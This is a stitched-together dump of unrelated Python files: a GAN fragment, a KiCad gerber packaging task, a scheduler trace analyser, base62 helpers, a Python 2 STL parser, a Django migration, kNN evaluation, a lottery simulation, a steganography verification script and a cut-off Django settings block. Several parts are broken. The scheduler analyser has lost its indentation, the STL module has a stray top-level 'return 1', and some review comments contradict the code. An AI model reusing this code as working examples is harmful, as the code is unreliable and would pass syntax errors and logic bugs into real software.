                feed = {discriminator.input_x: x_batch, discriminator.input_y: y_batch }
                _ = sess.run(discriminator.train_op, feed)
# Script entry point.
if __name__ == '__main__':
    main()
|
from invoke import task
@task(default=True)
def package(c, n="switch-dip"):
    """Rename KiCad gerber/drill outputs for board `n` into fab-house
    extensions under order/ and zip them as order/<n>.zip."""
    c.run("rm -rf order/*", warn=True)
    # (KiCad output suffix, fab-house extension) — one `cp` per pair,
    # replacing nine copy-pasted commands.
    renames = [
        ("F_Cu.gbr", ".GTL"),
        ("B_Cu.gbr", ".GBL"),
        ("F_Mask.gbr", ".GTS"),
        ("B_Mask.gbr", ".GBS"),
        ("F_SilkS.gbr", ".GTO"),
        ("B_SilkS.gbr", ".GBO"),
        ("PTH.drl", ".TXT"),
        ("NPTH.drl", "-NPTH.TXT"),
        ("Edge_Cuts.gbr", ".GML"),
    ]
    for src_suffix, dst_suffix in renames:
        c.run(f"cp out/{n}-{src_suffix} order/{n}{dst_suffix}")
    with c.cd("order"):
        c.run(f"zip _.zip {n}*")
        c.run(f"mv _.zip {n}.zip")
|
class aborted_tasks:
    """One aborted task record from a scheduler trace (all fields are the
    raw string tokens from the trace line)."""
    def __init__(self, index, arrival, proc_time, period, abs_deadline, finished, observed_proc_time):
        self.index = index                            # task index (0, 1, 2)
        self.arrival = arrival                        # arrival time
        self.proc_time = proc_time                    # stated processing time
        self.period = period                          # task period
        self.abs_deadline = abs_deadline              # absolute deadline
        self.finished = finished                      # completion time
        self.observed_proc_time = observed_proc_time  # measured processing time
class finished_tasks:
    """One finished task record from a scheduler trace (all fields are the
    raw string tokens from the trace line)."""
    def __init__(self, index, arrival, proc_time, period, abs_deadline, finished, observed_proc_time):
        self.index = index                            # task index (0, 1, 2)
        self.arrival = arrival                        # arrival time
        self.proc_time = proc_time                    # stated processing time
        self.period = period                          # task period
        self.abs_deadline = abs_deadline              # absolute deadline
        self.finished = finished                      # completion time
        self.observed_proc_time = observed_proc_time  # measured processing time
# read trace data into a list of objects
def readIntoList(program, a_list, f_list):
tokens = []
for line in program:
tokens = line.split(":")
if tokens[0] == "a":
a_list.append(finished_tasks(
tokens[1], tokens[2], tokens[3], tokens[4], tokens[5], tokens[6], tokens[7]))
if tokens[0] == "f":
f_list.append(finished_tasks(
tokens[1], tokens[2], tokens[3], tokens[4], tokens[5], tokens[6], tokens[7]))
# calculate avg processing time in a program
def calcAvgProcTime(list, name):
total_proc_time = 0
for i in list:
total_proc_time += int(i.proc_time)
print("Avg proc time for " + name + ":\t" + str("%.2f" %
round(total_proc_time / len(list), 2)))
# calculate avg response time in a program
def calcAvgResponseTime(list, name):
total_response_time = 0
for i in list:
curr_response_time = int(i.finished) - int(i.arrival)
total_response_time += curr_response_time
print("Avg resp time for " + name + ":\t" + str("%.2f" %
round(total_response_time / len(list), 2)))
# calculate avg lateness if late and earliness if early
def calcAvgLateness(list, name):
total_lateness = 0
no_of_late_0 = 0
no_of_late_1 = 0
no_of_late_2 = 0
total_earliness = 0
for i in list:
if(int(i.finished) - int(i.abs_deadline)) > 0:
if(int(i.index) == 0):
no_of_late_0 += 1
elif(int(i.index) == 1):
no_of_late_1 += 1
elif(int(i.index) == 2):
no_of_late_2 += 1
curr_lateness = int(i.finished) - int(i.abs_deadline)
total_lateness += curr_lateness
elif(int(i.finished) - int(i.abs_deadline)) < 0:
curr_earliness = int(i.abs_deadline) - int(i.finished)
total_earliness += curr_earliness
print("Avg lateness for " + name + ":\t" +
str("%.2f" % round(total_lateness / len(list), 2)))
print(f"Task 0 was late {no_of_late_0} times for {name}")
print(f"Task 1 was late {no_of_late_1} times for {name}")
print(f"Task 2 was late {no_of_late_2} times for {name}")
print("Avg earliness for " + name + ":\t" + str("%.2f" %
round(total_earliness / len(list), 2)))
print("\n")
def checkDiff(list, name):
    """Print, per task index, the summed |stated - observed| processing-time gap."""
    diffs = {0: 0, 1: 0, 2: 0}
    for task in list:
        stated = int(task.proc_time)
        observed = int(task.observed_proc_time)
        if stated != observed:
            idx = int(task.index)
            if idx in diffs:
                diffs[idx] += abs(stated - observed)
    print(f"Total diff for task 0 is {diffs[0]} for {name}")
    print(f"Total diff for task 1 is {diffs[1]} for {name}")
    print(f"Total diff for task 2 is {diffs[2]} for {name}")
    print("\n")
def checkObservedProc(list, name):
    """Print the mean observed processing time per task index alongside the
    (last seen) stated processing time."""
    obs_total = {0: 0, 1: 0, 2: 0}
    stated = {0: 0, 1: 0, 2: 0}
    counts = {0: 0, 1: 0, 2: 0}
    for task in list:
        idx = int(task.index)
        if idx in obs_total:
            obs_total[idx] += int(task.observed_proc_time)
            stated[idx] = int(task.proc_time)  # plain assignment: keeps last value only
            counts[idx] += 1
    # calc avg obs proc time
    print(
        f"Avg obs proc time for task 0 is {obs_total[0] / counts[0]} for {name}, stated: {stated[0]}")
    print(
        f"Avg obs proc time for task 1 is {obs_total[1] / counts[1]} for {name}, stated: {stated[1]}")
    print(
        f"Avg obs proc time for task 2 is {obs_total[2] / counts[2]} for {name}, stated: {stated[2]}")
    print("\n")
def _read_trace(path):
    """Parse one trace file into (aborted, finished) lists, closing the
    handle afterwards — the original leaked all four open file objects."""
    aborted, finished = [], []
    with open(path, "r") as trace:
        readIntoList(trace, aborted, finished)
    return aborted, finished

aborted_list_prog1_edf, finished_list_prog1_edf = _read_trace("trace-prog1-edf.data")
aborted_list_prog1_rm, finished_list_prog1_rm = _read_trace("trace-prog1-rm.data")
aborted_list_prog2_edf, finished_list_prog2_edf = _read_trace("trace-prog2-edf.data")
aborted_list_prog2_rm, finished_list_prog2_rm = _read_trace("trace-prog2-rm.data")

# NOTE: the label strings differ between sections ("edf 1" vs " rm 1" padding),
# so each section keeps its own label list.
print("")
print("Processing time: ")
for flist, label in ((finished_list_prog1_edf, "edf 1"),
                     (finished_list_prog1_rm, " rm 1"),
                     (finished_list_prog2_edf, "edf 2"),
                     (finished_list_prog2_rm, " rm 2")):
    calcAvgProcTime(flist, label)
print("")
print("Response time: ")
for flist, label in ((finished_list_prog1_edf, "edf 1"),
                     (finished_list_prog1_rm, " rm 1"),
                     (finished_list_prog2_edf, "edf 2"),
                     (finished_list_prog2_rm, " rm 2")):
    calcAvgResponseTime(flist, label)
print("")
print("Lateness")
for flist, label in ((finished_list_prog1_edf, "edf 1"),
                     (finished_list_prog1_rm, " rm 1"),
                     (finished_list_prog2_edf, "edf 2"),
                     (finished_list_prog2_rm, " rm 2")):
    calcAvgLateness(flist, label)
print("")
print("Obs_proc time proc_time diff")
for flist, label in ((finished_list_prog1_edf, "edf 1"),
                     (finished_list_prog1_rm, "rm 1"),
                     (finished_list_prog2_edf, "edf 2"),
                     (finished_list_prog2_rm, "rm 2")):
    checkDiff(flist, label)
print("")
print("Avg obs proc time")
for flist, label in ((finished_list_prog1_edf, "edf 1"),
                     (finished_list_prog1_rm, "rm 1"),
                     (finished_list_prog2_edf, "edf 2"),
                     (finished_list_prog2_rm, "rm 2")):
    checkObservedProc(flist, label)
|
import base64
import os
import sys

# Make the vendored pybase62 importable when this file runs outside a package.
if os.path.join(os.path.dirname(__file__), "pybase62") not in sys.path:
    print('adding pybase62 to sys.path')
    sys.path.append(os.path.join(os.path.dirname(__file__), "pybase62"))
try:
    from .pybase62 import base62
except ImportError:  # BUG FIX: bare `except:` hid unrelated errors; relative
    # import failure outside a package raises ImportError, so catch only that.
    import pybase62 as base62
def _b62encode_int(s, charset=base62.CHARSET_DEFAULT):
    """Encode an integer-like value as base62 UTF-8 bytes.
    On non-integer input the value is printed and returned unchanged."""
    try:
        number = int(s)
    except ValueError:
        print('%s is not an integer' % s)
        return s
    encoded = base62.encode(number, charset=charset)
    return str(encoded).encode('UTF-8')
def b62decode_int(s):
    """Decode base62 bytes (default charset) to the decimal string, as bytes."""
    decoded = base62.decode(s.decode('UTF-8'), charset=base62.CHARSET_DEFAULT)
    return str(decoded).encode('UTF-8')
def b62encode_int(s):
    """Encode an integer-like value using the default base62 charset."""
    return _b62encode_int(s, charset=base62.CHARSET_DEFAULT)
def b62decode_inv_int(s):
    """Decode base62 bytes (inverted charset) to the decimal string, as bytes."""
    decoded = base62.decode(s.decode('UTF-8'), charset=base62.CHARSET_INVERTED)
    return str(decoded).encode('UTF-8')
def b62encode_inv_int(s):
    """Encode an integer-like value using the inverted base62 charset."""
    return _b62encode_int(s, charset=base62.CHARSET_INVERTED)
######
# Base62 <-> Hex
######
def _b62encode_hex(s, charset=base62.CHARSET_DEFAULT):
    """Encode hex-string bytes as base62 UTF-8 bytes.
    On non-hex input the value is printed and returned unchanged."""
    try:
        the_string = s.decode('UTF-8')
        b = bytes.fromhex(the_string)
    except Exception:
        # BUG FIX: the message previously used `the_string`, which is unbound
        # when decode() itself raises; report the raw input instead.
        print('%s is not in hex.' % s)
        return s
    # (dead `retval` assignment removed)
    return str(base62.encodebytes(b, charset=charset)).encode('UTF-8')
def _b62decode_hex(s, charset=base62.CHARSET_DEFAULT):
    """Decode base62 bytes back to uppercase hex bytes."""
    # (dead `bytearray` allocation removed — it was never used)
    decoded = base62.decodebytes(s.decode('ASCII'), charset=charset)
    return base64.b16encode(decoded)
def b62encode_hex(s):
    """Encode hex bytes using the default base62 charset."""
    return _b62encode_hex(s, charset=base62.CHARSET_DEFAULT)
def b62decode_hex(s):
    """Decode base62 bytes to hex using the default charset."""
    return _b62decode_hex(s, charset=base62.CHARSET_DEFAULT)
def b62encode_inv_hex(s):
    """Encode hex bytes using the inverted base62 charset."""
    return _b62encode_hex(s, charset=base62.CHARSET_INVERTED)
def b62decode_inv_hex(s):
    """Decode base62 bytes to hex using the inverted charset."""
    return _b62decode_hex(s, charset=base62.CHARSET_INVERTED)
|
import sys, struct
# 4x4 identity matrix: the default (no-op) transform for applymatrix()/transform().
I=[
[1,0,0,0],
[0,1,0,0],
[0,0,1,0],
[0,0,0,1]
]
def transpose(matrix):
    """Return the transpose of a list-of-rows matrix."""
    return [[row[i] for row in matrix] for i in xrange(len(matrix[0]))]
def multmatrix(vector, matrix):
    """Multiply a row vector by a matrix; returns a list (Python 2 map)."""
    scaled_columns = [[component[0] * entry for entry in component[1]]
                      for component in zip(vector, transpose(matrix))]
    return map(sum, transpose(scaled_columns))
def applymatrix(facet, matrix=I):
    """Apply a 4x4 transform to a facet [normal, [v1, v2, v3]].
    The normal is transformed as a point, exactly as in the original."""
    new_normal = multmatrix(facet[0] + [1], matrix)[:3]
    new_vertices = map(lambda vertex: multmatrix(vertex + [1], matrix)[:3], facet[1])
    return [new_normal, new_vertices]
# Sample facet (degenerate: all three vertices identical) for manual testing.
f=[[0,0,0],[[-3.022642, 0.642482, -9.510565],[-3.022642, 0.642482, -9.510565],[-3.022642, 0.642482, -9.510565]]]
# Sample transform matrix: translate by +1 along Z.
m=[
[1,0,0,0],
[0,1,0,0],
[0,0,1,1],
[0,0,0,1]
]
def emitstl(filename, facets=[], objname="stltool_export"):
    """Write `facets` to `filename` as an ascii STL solid named `objname`.
    Each facet is [normal, [v1, v2, v3]]. Does nothing when filename is None.
    NOTE: the mutable default for `facets` is kept for interface
    compatibility; it is never mutated here.
    """
    if filename is None:
        return
    # `with` guarantees the handle is closed even if a write fails
    # (the original left the file open on any exception).
    with open(filename, "w") as f:
        f.write("solid "+objname+"\n")
        for i in facets:
            f.write(" facet normal "+" ".join(map(str,i[0]))+"\n outer loop\n")
            for j in i[1]:
                f.write("  vertex "+" ".join(map(str,j))+"\n")
            f.write(" endloop"+"\n")
            f.write(" endfacet"+"\n")
        f.write("endsolid "+objname+"\n")
class stl:
    """Parser/container for STL solids (ascii or binary) with affine
    transform helpers. Python 2 code: relies on map() returning lists.
    State: facets is a list of [normal, [v1, v2, v3]]; facetsminz/facetsmaxz
    pair each facet with its min/max vertex Z for slicing queries."""
    def __init__(self, filename=None):
        # parser state for the ascii line-by-line parser
        self.facet=[[0,0,0],[[0,0,0],[0,0,0],[0,0,0]]]
        self.facets=[]
        self.facetsminz=[]
        self.facetsmaxz=[]
        self.name=""
        self.insolid=0
        self.infacet=0
        self.inloop=0
        self.facetloc=0
        if filename is None:
            return
        self.f=list(open(filename))
        if not self.f[0].startswith("solid"):
            print "Not an ascii stl solid - attempting to parse as binary"
            f=open(filename,"rb")
            # binary STL: 80-byte header + 4-byte little-endian facet count
            buf=f.read(84)
            while(len(buf)<84):
                newdata=f.read(84-len(buf))
                if not len(newdata):
                    break
                buf+=newdata
            facetcount=struct.unpack_from("<I",buf,80)
            # 12 floats (normal + 3 vertices) + 2-byte attribute count
            facetformat=struct.Struct("<ffffffffffffH")
            for i in xrange(facetcount[0]):
                buf=f.read(50)
                while(len(buf)<50):
                    newdata=f.read(50-len(buf))
                    if not len(newdata):
                        break
                    buf+=newdata
                fd=list(facetformat.unpack(buf))
                # NOTE(review): "soloid" typo kept — it is a runtime string
                self.name="binary soloid"
                self.facet=[fd[:3],[fd[3:6],fd[6:9],fd[9:12]]]
                self.facets+=[self.facet]
                facet=self.facet
                self.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
                self.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
            f.close()
            return
        for i in self.f:
            if not self.parseline(i):
                return
    def translate(self,v=[0,0,0]):
        """Return a new stl translated by vector v."""
        matrix=[
        [1,0,0,v[0]],
        [0,1,0,v[1]],
        [0,0,1,v[2]],
        [0,0,0,1]
        ]
        return self.transform(matrix)
    def rotate(self,v=[0,0,0]):
        """Return a new stl rotated by v degrees; applies Z, then the v[0]
        and v[1] axis rotations (note the x/y naming swap below)."""
        import math
        z=v[2]
        matrix1=[
        [math.cos(math.radians(z)),-math.sin(math.radians(z)),0,0],
        [math.sin(math.radians(z)),math.cos(math.radians(z)),0,0],
        [0,0,1,0],
        [0,0,0,1]
        ]
        # NOTE(review): y is taken from v[0] and x from v[1] — confirm intended
        y=v[0]
        matrix2=[
        [1,0,0,0],
        [0,math.cos(math.radians(y)),-math.sin(math.radians(y)),0],
        [0,math.sin(math.radians(y)),math.cos(math.radians(y)),0],
        [0,0,0,1]
        ]
        x=v[1]
        matrix3=[
        [math.cos(math.radians(x)),0,-math.sin(math.radians(x)),0],
        [0,1,0,0],
        [math.sin(math.radians(x)),0,math.cos(math.radians(x)),0],
        [0,0,0,1]
        ]
        return self.transform(matrix1).transform(matrix2).transform(matrix3)
    def scale(self,v=[0,0,0]):
        """Return a new stl scaled per-axis by v."""
        matrix=[
        [v[0],0,0,0],
        [0,v[1],0,0],
        [0,0,v[2],0],
        [0,0,0,1]
        ]
        return self.transform(matrix)
    def transform(self,m=I):
        """Return a new stl with every facet transformed by 4x4 matrix m,
        rebuilding the min/max-Z indexes."""
        s=stl()
        s.facets=[applymatrix(i,m) for i in self.facets]
        s.insolid=0
        s.infacet=0
        s.inloop=0
        s.facetloc=0
        s.name=self.name
        for facet in s.facets:
            s.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
            s.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
        return s
    def export(self,f=sys.stdout):
        """Write this solid as ascii STL to file object f (default stdout)."""
        f.write("solid "+self.name+"\n")
        for i in self.facets:
            f.write(" facet normal "+" ".join(map(str,i[0]))+"\n")
            f.write(" outer loop"+"\n")
            for j in i[1]:
                f.write("  vertex "+" ".join(map(str,j))+"\n")
            f.write(" endloop"+"\n")
            f.write(" endfacet"+"\n")
        f.write("endsolid "+self.name+"\n")
        f.flush()
    def parseline(self,l):
        """Consume one ascii STL line; returns 0 at endsolid, 1 otherwise."""
        l=l.strip()
        if l.startswith("solid"):
            self.insolid=1
            self.name=l[6:]
            #print self.name
        elif l.startswith("endsolid"):
            self.insolid=0
            return 0
        elif l.startswith("facet normal"):
            self.infacet=11
            self.facetloc=0
            self.facet=[[0,0,0],[[0,0,0],[0,0,0],[0,0,0]]]
            self.facet[0]=map(float,l.split()[2:])
        elif l.startswith("endfacet"):
            self.infacet=0
            self.facets+=[self.facet]
            facet=self.facet
            self.facetsminz+=[(min(map(lambda x:x[2], facet[1])),facet)]
            self.facetsmaxz+=[(max(map(lambda x:x[2], facet[1])),facet)]
        elif l.startswith("vertex"):
            self.facet[1][self.facetloc]=map(float,l.split()[1:])
            self.facetloc+=1
        return 1
return 1
# Demo/debug entry point — the `and 0` keeps it permanently disabled.
if __name__=="__main__" and 0:
    s=stl("sphere.stl")
    # sweep horizontal slices z=-10..10 and count facets crossing each slice
    for i in xrange(-10,11):
        working=s.facets[:]
        # drop facets entirely above the slice...
        for j in reversed(sorted(s.facetsminz)):
            if(j[0]>i):
                working.remove(j[1])
            else:
                break
        # ...and facets entirely below it
        for j in (sorted(s.facetsmaxz)):
            if(j[0]<i):
                working.remove(j[1])
            else:
                break
        print i,len(working)
    emitstl("sphereout.stl",s.facets,"emitted_object")
#stl("../prusamendel/stl/mendelplate.stl")
|
# Generated by Django 2.2.10 on 2020-05-12 01:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: relabels the prestamotienda faxofi/tlfofi fields
    (verbose_name only — no schema change beyond the field definition)."""
    dependencies = [
        ('servicios', '0016_auto_20200512_0018'),
    ]
    operations = [
        migrations.AlterField(
            model_name='prestamotienda',
            name='faxofi',
            field=models.CharField(blank=True, max_length=150, null=True, verbose_name='Telf. Celular'),
        ),
        migrations.AlterField(
            model_name='prestamotienda',
            name='tlfofi',
            field=models.CharField(blank=True, max_length=150, null=True, verbose_name='Telf. Local.'),
        ),
    ]
|
import torch
import datasets
from lib.utils import AverageMeter, traverse
import sys
from packages.register import REGISTER
from packages.loggers.std_logger import STDLogger as logger
def NN(net, npc, trainloader, testloader, K=0, sigma=0.1,
       recompute_memory=False, device='cpu'):
    """1-nearest-neighbour evaluation: classify each test sample by the label
    of its most cosine-similar training feature. Returns top-1 accuracy.
    NOTE(review): K and sigma are unused here (kept for signature parity
    with kNN); features are assumed L2-normalised so mm() is cosine
    similarity — confirm against npc.memory's producer.
    """
    # switch model to evaluation mode
    net.eval()
    # tracking variables
    correct = 0.
    total = 0
    trainFeatures = npc.memory
    trainLabels = torch.LongTensor(trainloader.dataset.labels).to(device)
    # recompute features for training samples
    if recompute_memory:
        trainFeatures, trainLabels = traverse(net, trainloader,
                                testloader.dataset.transform, device)
        trainFeatures = trainFeatures.t()
    # start to evaluate
    with torch.no_grad():
        for batch_idx, (inputs, targets, indexes) in enumerate(testloader):
            logger.progress(batch_idx, len(testloader), 'processing %d/%d batch...')
            inputs, targets = inputs.to(device), targets.to(device)
            batchSize = inputs.size(0)
            # forward
            features = net(inputs)
            # cosine similarity
            dist = torch.mm(features, trainFeatures)
            # index of the single most similar training sample per test sample
            yd, yi = dist.topk(1, dim=1, largest=True, sorted=True)
            candidates = trainLabels.view(1,-1).expand(batchSize, -1)
            retrieval = torch.gather(candidates, 1, yi)
            retrieval = retrieval.narrow(1, 0, 1).clone().view(-1)
            yd = yd.narrow(1, 0, 1)  # NOTE(review): yd is unused after this
            total += targets.size(0)
            correct += retrieval.eq(targets.data).sum().item()
    return correct/total
def kNN(net, npc, trainloader, testloader, K=200, sigma=0.1,
        recompute_memory=False, device='cpu'):
    """Weighted k-NN evaluation: each test sample is classified by its K most
    cosine-similar training features, weighted by exp(similarity / sigma).
    Returns top-1 accuracy.
    NOTE(review): top5 is accumulated but never returned; `correct.narrow(1,0,5)`
    also assumes K >= 5 — confirm before lowering K.
    """
    # set the model to evaluation mode
    net.eval()
    # tracking variables
    total = 0
    trainFeatures = npc.memory
    trainLabels = torch.LongTensor(trainloader.dataset.labels).to(device)
    # recompute features for training samples
    if recompute_memory:
        trainFeatures, trainLabels = traverse(net, trainloader,
                                testloader.dataset.transform, device)
        trainFeatures = trainFeatures.t()
    C = trainLabels.max() + 1  # number of classes
    # start to evaluate
    top1 = 0.
    top5 = 0.
    with torch.no_grad():
        # reused buffer for the one-hot labels of the K retrieved neighbours
        retrieval_one_hot = torch.zeros(K, C.item()).to(device)
        for batch_idx, (inputs, targets, indexes) in enumerate(testloader):
            logger.progress(batch_idx, len(testloader), 'processing %d/%d batch...')
            batchSize = inputs.size(0)
            targets, inputs = targets.to(device), inputs.to(device)
            # forward
            features = net(inputs)
            # cosine similarity
            dist = torch.mm(features, trainFeatures)
            yd, yi = dist.topk(K, dim=1, largest=True, sorted=True)
            candidates = trainLabels.view(1,-1).expand(batchSize, -1)
            retrieval = torch.gather(candidates, 1, yi)
            # in-place resize + scatter builds one-hot rows for this batch
            retrieval_one_hot.resize_(batchSize * K, C).zero_()
            retrieval_one_hot.scatter_(1, retrieval.view(-1, 1), 1)
            # similarity-weighted vote per class
            yd_transform = yd.clone().div_(sigma).exp_()
            probs = torch.sum(torch.mul(retrieval_one_hot.view(batchSize, -1 , C),
                              yd_transform.view(batchSize, -1, 1)), 1)
            _, predictions = probs.sort(1, True)
            # Find which predictions match the target
            correct = predictions.eq(targets.data.view(-1,1))
            top1 = top1 + correct.narrow(1,0,1).sum().item()
            top5 = top5 + correct.narrow(1,0,5).sum().item()
            total += targets.size(0)
    return top1/total
def get(name):
    """Return the evaluation function registered in this module under `name`."""
    return REGISTER.get_class(__name__, name)
# Register both evaluators so callers can fetch them by name via get().
REGISTER.set_package(__name__)
REGISTER.set_class(__name__, 'knn', kNN)
REGISTER.set_class(__name__, 'nn', NN)
# Martingale-style lottery simulation: each round, buy the smallest number of
# tickets whose winnings would exceed everything spent so far.
price = 2   # price per ticket
bonus = 5   # payout per winning ticket
costs = []  # cost of each completed round

for round_no in range(20):
    spent_so_far = sum(costs)
    tickets = 1  # how many tickets to buy this round
    while True:
        round_cost = tickets * price        # total spent this round
        round_reward = tickets * bonus      # total won this round
        total_spent = spent_so_far + round_cost
        if total_spent < round_reward:
            costs.append(round_cost)
            print(round_no + 1, '='*10, tickets, '='*10, round_cost, '='*10, round_reward, '='*10, total_spent)
            break
        tickets += 1
|
import sys
print('|'+('-'*68)+'|' +
'\n| Data_Verification process has been executed successfully. Please |' +
'\n| follow the instructions below! Terminating process earlier might |' +
'\n| leave unnecessary files behind, and might not hide your data. |' +
'\n|'+('-'*68)+'|')
def text2ascii(a_word):
    '''
    Converts text to ascii with all the required spaces.
    Spaces are later converted using hexadecimal values.
    Input: users text
    Return: text converted to ascii
    NOTE: every code — including the last — is followed by a space; the
    original guard `i != len(a_word)` was always true, and this trailing
    space must be preserved so hidden and verified data still match.
    '''
    return ''.join(str(ord(character)) + ' ' for character in a_word)
def pumpKey(a_word, k):
    '''
    Whenever the key is shorter than the text, the key is cycled until it
    matches the text length.
    Input: user word and key
    Return: key repeated to len(a_word)
    '''
    cycled = ''
    for position in range(len(a_word)):
        cycled += str(k[position % len(k)])
    return cycled
def encr_ascii(ascii_x, ascii_k, x):
    '''
    Encrypt the digit string `ascii_x` with key digits `ascii_k`:
    each output char is chr(digit + key_digit + 33), with the key index
    taken as i mod len(x) (`x` is the plaintext, used only for its length).
    Example: digits of X='hello' and K='maxim' combine as 1+1+33=35 -> '#',
    0+0+33=33 -> '!', etc.
    '''
    cipher = ''
    used = 0
    for i in range(len(ascii_x)):
        key_index = int(i % len(x))  # i mod (len X)
        used += 1
        if used > len(ascii_k):
            # fallback once the running counter passes the key length
            key_index = len(ascii_x) - key_index
            used = 0
        key_digit = int(ascii_k[key_index])
        cipher += str(chr(int(ascii_x[i]) + key_digit + 33))
    return cipher
def decr_ascii(encrypt_x, ascii_k, x):
    '''
    Inverse of encr_ascii: for each cipher char, digit = ord(char) - key_digit - 33.
    Remark: ASCII_Val ---> converted version from ASCII_Char (from encryption)
    Decryption example: '#' = 35 ---> 35 - 1 - 33 = 1, '!' = 33 ---> 0, etc.
    `x` is the plaintext, used only for its length in the key-index modulus.
    '''
    decrypt_x = ''
    count = 0
    for i in range(len(encrypt_x)):
        ascii_ = ord(encrypt_x[i])  # get ascii value
        k_val = int(i % len(x))  # i mod (len X)
        count += 1
        if count > len(ascii_k):  # if out of range, restarts the k_val
            # BUG FIX: was `len(ascii_x)`, a name that does not exist in this
            # function (NameError); encr_ascii uses its own first parameter
            # here, so the mirror is this function's first parameter.
            k_val = len(encrypt_x) - k_val
            count = 0
        k_mod = int(ascii_k[k_val])  # K_(1 mod (len(x)), K_(2 mod (len(x)) etc.
        decrypt = ascii_ - k_mod - 33  # minus all the previous combinations
        decrypt_x += str(decrypt)
    return decrypt_x
def convert2hex(store_a_word):
    '''
    Hex-encodes every character (no 0x prefix) and concatenates the results.
    Works for a plain string or a list of strings; either way the output is
    the hex digits of every character, in order.
    Input: users text
    Return: concatenated hexadecimal values
    '''
    return ''.join(hex(ord(character))[2:]
                   for word in store_a_word
                   for character in word)
def generate_hexa_table(hexa_word):
    '''
    generates a hexa_table in the format of .XML file: the input is split
    into rows of at most 64 characters.
    Input: hexa input
    Return: hexa table (list of <=64-char strings)
    NOTE(review): the loop budget is len(hexa_word)+1 iterations, but each
    row flush consumes one iteration without consuming a character — for
    inputs needing 2+ flushes (roughly > 128 chars) the tail can be lost.
    Left unchanged because the companion hiding tool presumably shares the
    same behaviour; confirm before fixing.
    '''
    hexa_word_table = []
    count_max_word = 0
    count_max_length = 0
    word = ''
    for i in range(len(hexa_word)+1):
        if count_max_word <= 63: #gets maximum length of the word
            word += hexa_word[count_max_length] #creates a word
            if (count_max_length + 1) == len(hexa_word): # if the remaining length != 64
                hexa_word_table.append(word)
                break
            count_max_word +=1
            count_max_length += 1
        else:
            hexa_word_table.append(word)
            count_max_word = 0 #resets max length
            word = ''
    return hexa_word_table
def find_data(file, timecode, hexa_word):
    '''
    takes users file, timecode, and the word in hexadecimal format, and compares with the data inside the
    selected timecode.
    Input: key, timecode, plaintext
    Return: banner string — success if every row of the hexa table is found,
    in order, inside the selected timecode's <data> section.
    '''
    hexa_table = generate_hexa_table(hexa_word)
    count_hex = 0  # next row of hexa_table we expect to match
    with open(file) as find_data:
        # simple line-driven state machine over the XML-ish carrier file
        accessed_timecode = False #timecode is not found
        accessed_data = False #data is not found
        data_found = True
        data_found_1 = 'no'
        for line in find_data:
            if (timecode in line) and (len(line) == 26+len(timecode)): #finds the exact timecode
                accessed_timecode = True
            if (accessed_data == True and accessed_timecode == True and data_found == True): #looks for the data inside the table
                word = ''
                for i in range(6,len(line)): #skips 6 spaces infront of the hexadecimal values and create a full hexa word
                    word += line[i]
                if hexa_table[count_hex] in word: #checks if the word inside the the hexa_table
                    count_hex += 1
                    data_found_1 = 'found' #changes the value to found
                    if data_found_1 == 'found' and len(hexa_table) == count_hex: #checks the condition
                        return '|'+('-'*68)+'|' + '\n| SUCCESS!                                                           |' + '\n| The verification has been successfully accomplished. The data     |' + '\n| has been detected inside the selected timecode.                    |' + '\n|'+('-'*68)+'|'
                else:
                    data_found_1 = 'not_found' #changes the value to not_found
                    data_found = False
                    if data_found_1 == 'not_found': #checks the condition
                        return '|'+('-'*68)+'|' + '\n| UNSUCCESS!                                                         |' + '\n| The verification is unsuccessful! The entered text has not        |' + '\n| been found. Please, check your text, key, or the timecode again!  |' + '\n|'+('-'*68)+'|'
            if (accessed_timecode == True) and ('<data>' in line): #skips <data> line
                accessed_data = True
    # timecode (or its data) never reached
    return '|'+('-'*68)+'|' + '\n| UNSUCCESS!                                                         |' + '\n| The verification is unsuccessful! The entered text has not        |' + '\n| been found. Please, check your text, key, or the timecode again!  |' + '\n|'+('-'*68)+'|'
def hex_to_ascii(decrypt_x):
    '''
    Converts a hexadecimal string to ASCII text, two hex digits per character.
    Input: decrypted text in hexadecimal format
    Return: converted decrypted text in ASCII format; a trailing unpaired
    digit is ignored (same as the original behaviour).
    '''
    # Simplification: the original accumulated a 2-char buffer with a counter
    # and then ran a redundant inner join over that buffer; decoding complete
    # pairs directly is equivalent and clearer.
    return ''.join(chr(int(decrypt_x[i:i + 2], 16))
                   for i in range(0, len(decrypt_x) - 1, 2))
def main(file):
    '''
    Drives the verification: prompts for the hidden text, the key and the
    timecode, rebuilds the encrypted hexadecimal word, and searches for it
    inside `file` via find_data().
    '''
    #user's input
    a_word = input(' Enter the text that you have entered during\n the data hiding process in the following format\n \'word\' and press [ENTER]: ')
    k = input('\n Enter the key that you have entered during\n the data hiding process in the following format \n \'key\' and press [ENTER]: ') #encryption key
    select_timecode = input('\n Enter the timecode that you have selected during\n the data hiding process in the following format \n \'0.00\' and press [ENTER]: ') #gets encrypted
    #when the key is shorter than the text, repeat it until it covers the text
    if len(k) < len(a_word):
        k = pumpKey(a_word,k)
    #convert to ascii
    ascii_a_word = text2ascii(a_word)
    ascii_k = text2ascii(k)
    #convert to hexadecimal
    ascii_a_word = convert2hex(ascii_a_word)
    ascii_k = convert2hex(ascii_k)
    #if the size of ascii_k is still < ascii_a_word then the key must be pumped again
    if len(ascii_k) < len(ascii_a_word):
        ascii_k = pumpKey(ascii_a_word,ascii_k)
    #encrypts the ascii text with the key
    encrypt_a_word = encr_ascii(ascii_a_word, ascii_k, a_word)
    #convert encrypted text to hexadecimal
    hex_list = convert2hex(encrypt_a_word) # calls the function to convert the text to hexadecimal
    hexa_word = ''
    for i in range(len(hex_list)):
        hexa_word += hex_list[i] #concatenates chunks into one pure hexadecimal word
    print(find_data(file, select_timecode, hexa_word)) #searches for the hidden data
# Script entry point: the stego file to verify is passed as the first CLI argument.
# NOTE(review): `sys` must be imported earlier in this file — not visible in this chunk.
file = sys.argv[1] #runs hidden file
main(file)
|
import os
from .utils import BASE_DIR
# Django template configuration: the default Django engine with explicit
# per-app template directories, plus a Jinja2 engine for apps that use it.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'apps', 'canvas_gadget', 'templates'),
            os.path.join(BASE_DIR, 'apps', 'feedback', 'templates')
        ],
        'APP_DIRS': True,  # also search each installed app's templates/ dir
        'OPTIONS': {
